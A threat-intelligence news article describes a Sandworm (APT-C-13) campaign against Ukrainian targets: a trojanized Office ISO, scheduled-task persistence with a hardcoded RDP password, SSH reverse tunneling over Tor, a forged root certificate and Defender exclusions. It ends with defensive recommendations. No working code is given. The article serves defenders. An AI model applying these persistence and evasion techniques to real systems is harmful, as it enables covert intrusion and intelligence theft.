One of the world’s most dangerous state-backed hacking groups is actively targeting Remote Desktop Protocol (RDP) servers across critical infrastructure, defense organizations, and government agencies. The threat actor, known as APT-C-13 and widely tracked as Sandworm, APT44, Seashell Blizzard, and Voodoo Bear, has long been conducting cyber operations since at least 2009. Its latest campaign, however, marks a sharp shift in strategy—moving away from destructive, one-time strikes toward quiet, long-term infiltration designed to harvest intelligence over extended periods.
The campaign’s entry point is a disguised ISO image named `Microsoft.Office.2025×64.v2025.iso`, distributed through Telegram channels and software cracking communities in Ukraine. When a victim mounts the image and attempts to install or activate what appears to be Microsoft Office, hidden executors disguised as `auto.exe` or `setup.exe` silently launch in the background. This social engineering tactic leverages the trust users place in familiar software names. Once triggered, the initial loader profiles the target system and selectively deploys further malicious modules, including mechanisms for RDP server exploitation.
Weixin analysts at the 360 Threat Intelligence Center identified this campaign and confirmed that APT-C-13 is deploying a modular penetration framework known as the Tambur/Sumbur/Kalambur series. Researchers describe the group’s overall shift as moving from “instantaneous disruption” to “intelligence-driven persistent parasitism”—a calculated evolution observed between 2024 and 2026. One confirmed victim was a technician at a Ukrainian state-owned shipbuilding and machinery manufacturing plant, where the attackers had already established deep, covert access. The impact of this campaign is potentially serious and far-reaching, as the attack chain primarily abuses legitimate Windows tools, including scheduled tasks, SSH, PowerShell, and RDP, often evading standard antivirus solutions.
Persistence Through RDP Hijacking and Covert Tunneling
The most concerning technical aspect of this campaign is how the attackers establish and maintain long-term presence. The Tambur module, central to this persistent access strategy, plants scheduled tasks named “Tambur” and “Protector” within the `MicrosoftWindowsWDIProtector` path. This location is designed to mimic a native Windows Diagnostic Infrastructure component, aiding in its stealth. These tasks execute with full administrator-level privileges and utilize a hardcoded password (`1qaz@WSX`) to ensure continuous, uninterrupted access to the RDP service on the infected host.
The Kalambur and Sumbur modules further extend the attackers’ control by routing all command-and-control (C2) traffic through the Tor anonymous network, thereby obscuring the attackers’ true geographical location. Employing SSH reverse tunneling, the attackers map the victim’s RDP port (3389) to a remote C2 server. This technique facilitates silent remote logins from virtually any location worldwide. Sumbur, noted as a more refined iteration of this framework, mimics Microsoft Edge’s update service. It stores malicious VBScripts in a fabricated Edge update directory, triggering them every four hours to blend seamlessly with normal software activity.
The DemiMur module completes the attack chain by injecting a forged root certificate (`DemiMurCA.crt`) into the system’s trusted certificate store. This action causes Windows to treat all subsequent malicious payloads as fully trusted and signed. Combined with forced Microsoft Defender exclusions that cover the entire C drive, the host’s native security defenses are significantly neutralized, providing the attackers with a largely undetected operating environment.
Organizations are advised to immediately block third-party activation tools and unauthorized ISO images from entering their networks, as these are the primary delivery mechanisms for this threat. Close monitoring of internal network behavior for signs of tampering, including scheduled task creation, registry modifications, and PowerShell execution, is crucial. Endpoint security solutions must be kept fully updated, with regular, comprehensive scans implemented. Key institutions and industrial organizations should also strengthen internal auditing practices and develop specific detection rules to identify anomalous RDP and SSH activity, thereby preventing long-term intelligence theft.
The evolution of APT-C-13’s tactics, shifting from destructive attacks to persistent information gathering via RDP server compromises, underscores a broader trend in state-sponsored cyber warfare. The reliance on legitimate system tools and the use of anonymous networks present significant challenges for detection. Organizations must adapt their security postures to detect subtle, long-term intrusions rather than solely focusing on overt malicious activity. The ongoing nature of these campaigns suggests that vigilance and continuous adaptation of defensive strategies will be paramount.